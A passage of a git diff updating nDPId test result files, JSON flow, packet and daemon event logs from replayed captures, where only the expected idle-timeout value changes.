+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 
00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-data-len":912,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1586288042776} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 diff --git a/test/results/ndpi_match_string_subprotocol__error.pcapng.out b/test/results/ndpi_match_string_subprotocol__error.pcapng.out index 74a01bd15..211d4f1d3 100644 --- a/test/results/ndpi_match_string_subprotocol__error.pcapng.out +++ b/test/results/ndpi_match_string_subprotocol__error.pcapng.out 
@@ -1,14 +1,14 @@ 00489{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00575{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1258162014557} -00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258162014557,"flow_last_seen":1258162014557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258162014557,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258162014557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258162014557,"pkt":"AFBWmXinAB9to6gACABFAAA0MZpAADwGZloKAwkTCkSJdp64H5sCrVC3AAAAAIACwej09wAAAgQFZAEDAwABAQQC"} -01989{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"thread_ts_msec":1258162014576,"pkt":"AFBWmXinAB9to6gACABFAASOMZxAADwGYf4KAwkTCkSJdp64H5sCrVC4lwIqi1AYwhBuiwAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aWNlIEhUVFAvMS4xDQpTT0FQQWN0aW9uOiANCkNvbnRlbnQtdHlwZToAQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogOTQ4DQoNCjxzb2FwZW52OkVudmVsb3Bl2nhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpCb2R5PgogICAgPG5zOmNvbmZpZ3VyZT4KICAgICAgPG9iamVjdE5hbWQ+TldNMzoxLTEtMS0xNy4wLjA8L29iamVjdKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} 
-00975{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"thread_ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbnZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="} +00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258162014557,"flow_last_seen":1258162014557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258162014557,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258162014557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258162014557,"pkt":"AFBWmXinAB9to6gACABFAAA0MZpAADwGZloKAwkTCkSJdp64H5sCrVC3AAAAAIACwej09wAAAgQFZAEDAwABAQQC"} +01989{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258162014576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"thread_ts_msec":1258162014576,"pkt":"AFBWmXinAB9to6gACABFAASOMZxAADwGYf4KAwkTCkSJdp64H5sCrVC4lwIqi1AYwhBuiwAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aWNlIEhUVFAvMS4xDQpTT0FQQWN0aW9uOiANCkNvbnRlbnQtdHlwZToAQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogOTQ4DQoNCjxzb2FwZW52OkVudmVsb3Bl2nhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpCb2R5PgogICAgPG5zOmNvbmZpZ3VyZT4KICAgICAgPG9iamVjdE5hbWQ+TldNMzoxLTEtMS0xNy4wLjA8L29iamVjdKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} +01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} 
+00975{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"thread_ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbnZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="} 00578{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":8,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":1494,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1258165452647} 00234{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","l4_data_len":542,"global_ts_msec":1258165452669} 
01070{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":576,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":576,"pkt_l4_len":0,"thread_ts_msec":1258165452652,"pkt":"AFBWmXinAB9to6gACABFAAoyGs1AADwGeykKAwkTCkSJdp64H5sj28X747el5lAYwhBevQAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aVhlIEhUVFAvMS4xDQpTT09QQWN0aW9uOiANCkNvbnRlbnQtdHlwZTogQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogMzQ0DQoNCjxzb2FwZW52OkVudmVsb3BlIHhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zcmFwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpC8WR5PgogICAgPG5zOmdldENvbmZpZ3VyZWRUZW1wbGF0ZT4KICAgICAgPG9iamVjdE5hbWU+TldNOToxLTEtMS0xOTwvb2JqZWN0TmFtZT4KICAgICAgPHRlbXBsYXRlTmFtZT5YRFNMX0FUTV9QVE08L3RlbXBsYXRlTmFtZT4KICAgIDwvbnM6Z6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00958{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2179,"flow_avg_l4_payload_len":167,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00958{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2179,"flow_avg_l4_payload_len":167,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00584{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":14,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":2179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":1258165452688} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/13 diff --git a/test/results/nest_log_sink.pcap.out b/test/results/nest_log_sink.pcap.out index 0c668611e..d9e38250f 100644 --- a/test/results/nest_log_sink.pcap.out +++ b/test/results/nest_log_sink.pcap.out 
@@ -1,37 +1,37 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"nest_log_sink.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1536712992228} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536712992228,"flow_last_seen":1536712992228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536712992228,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1536712992228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536712992228,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2IAAP8GYxrAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1536712992289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1536712992289,"pkt":"GLQwJjRAAJD7JidrCABFAAAoNpRAAC0G7egjrlLtwKjyDytX92zEgGGFCKi\/QFAQgdDz\/QAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1536713052295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536713052295,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2MAAP8GYxnAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536712992228,"flow_last_seen":1536712992228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536712992228,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1536712992228,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536712992228,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2IAAP8GYxrAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1536712992289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1536712992289,"pkt":"GLQwJjRAAJD7JidrCABFAAAoNpRAAC0G7egjrlLtwKjyDytX92zEgGGFCKi\/QFAQgdDz\/QAA"} 